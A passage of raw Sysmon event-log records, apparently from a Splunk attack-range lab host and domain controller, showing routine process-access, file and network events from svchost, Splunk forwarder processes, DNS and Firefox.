11:20:51.248{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222131Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222130Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222129Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222128Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222127Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222126Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222125Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222124Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222123Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1893-6216-3105-000000003902}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222122Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1893-6216-3105-000000003902}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222121Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-1893-6216-3105-000000003902}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222120Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.138{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=415C5F22FE179CA0356213D80F96E8E2,SHA256=B91143BF3DA3916F9CFEF3F28E99266EA5D34A55546592509DB693C2E304D523,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:52.869{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B39FCFCAFC7799A6E502B257401F2DE9,SHA256=3E7A36C7FC8B428319E2EE66B1AB84292EF6E1271C778F1BD12B9C6495DA976F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222135Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:52.372{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80F15C2EE53A409B188F61B10DD836BB,SHA256=03824D06611C9067EFDB2067F0EBA6946CE00F4986AD56B890CE1471C95D5DB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222134Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:52.279{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72CEBD7358A3D8C51AFF218FC03F4B83,SHA256=6DE48EF6BDAEAD779DA020C009A5192A4B04C4EA95350B51EE3FAE8A515FC647,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:53.919{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=291E115878BF8872DE2BD0FD552EE762,SHA256=E5FEA0E82015B053A7DDBD87DDDB2ABEB0A20FE2840A7D9C39DD7B442421954A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222136Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:53.404{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDAA0CB491E2E07FE50C34C0B3AB77ED,SHA256=4FF044DF9FAB64B30A645AF8DF8C048799EC76D73F1625A65A1BDE45A704305B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:54.953{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9FAD98AD83102D414CA61859CF9B809,SHA256=B75F1CAA87F355981AA9269A4957E99A1EB19898B985C91B9BA0016D4EF72A40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222137Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:54.404{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B37AEDDA465A181E3559EC2A7BBEC0F,SHA256=E6591F0A83F8A3A3D17DB0D056EBAC4E6C9578E9AA9666BDACAFDF1D1472DE40,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222139Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:52.717{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51695-false10.0.1.12-8000- 23542300x8000000000000000222138Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:55.419{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03AC856EEE31EBA3DFDF8260C40678BB,SHA256=53DF2E5C9C6EAACB521B8E773953010934C515B15BA38CAD9577F578A379850C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222140Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:56.607{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7FD4FA4A5A7540655C675322FA9C0A1,SHA256=817AE1701D958002AE0F86DDF975198CF79B8ED6C936935CADFC3DF547D2F9EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:54.534{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49516-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:55.999{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B98BF528627F233DCBA86911A1F96B3,SHA256=AD3214823B3E38C66650697C83BFB3A72D9260441DCDBE85D7FCDB0591EA6739,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222141Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:57.622{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDC1AE2DBC958F5BAB455900FB8DD903,SHA256=48502E276E2EB8EF2CFF021E35EDC04F555633FBEEE9FEBDBAC6DFBEBD390320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:57.000{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=570AAF9BED88F724F1A3A193C2F37AC5,SHA256=97F5D17B2904688E0C6EDE740F7A3BC709B3FFD028AB44BCFC2347F3E33DE092,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222142Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:58.638{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5A12D607A2FBD63DCA89F7039BF9765,SHA256=A8F80BF93C4B6C85E542A7BA73B61559425760D5514E363C1AD635C6EC29561F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:58.003{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAD87EB6F395E0D0719AD1BEA9A4B516,SHA256=745571F0E3A04437926A8D751DA88301E078A0E52A71703C8B795FF8C5D8C842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222143Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:59.654{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1FE86CE0476DA753FC09E6DD2A3970C,SHA256=62F5F92D2585ACF00E91E051182A97A3CDB83F0B28382112CE66DA9F74C1A072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:59.039{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5E61F7385080160522DC21A83C7AE72,SHA256=FAE22E8F7E62732CAD333FFDC23768F63D58D4540E398405A75C6AE8E45E51CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222144Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:00.669{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9D40F18F96015FEB918A2484BC20D9F,SHA256=95E8F9DE5428D8DC64762D73735DE0243B81C8A78ED52A7393DF6D721539F109,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:58.346{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50751- 354300x8000000000000000298212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:58.346{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49517-false142.250.186.170fra24s08-in-f10.1e100.net443https 354300x8000000000000000298211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:58.339{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50875- 23542300x8000000000000000298210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:00.083{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74E33A16F6BDE14772E9FC2C984653E4,SHA256=C3E9A1B3861F39D974EEEEFE11BF866909962AB96606FB3132BDD115E363CF34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222146Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:01.685{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EF76C9FB722F82F6F0DADE9107EED17,SHA256=FF2825B6B7B324B27BF1A050889BD9379D99E9B4F4CCE9032CAE2782E1B90E62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.972{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=C525444624C9FDB989494A7FCD01A9BF,SHA256=B6B309C5AEB9748C21EBD33465C5ED072CE849F16B1E33150B089712E0B34DF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.972{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=5F9AE622870B9C15E12289C2EDB7201C,SHA256=CE174A89990FFB3D4118F1AE5E1980CFE8FD5EB38542EC05A4DED01B0C7993C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.972{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program 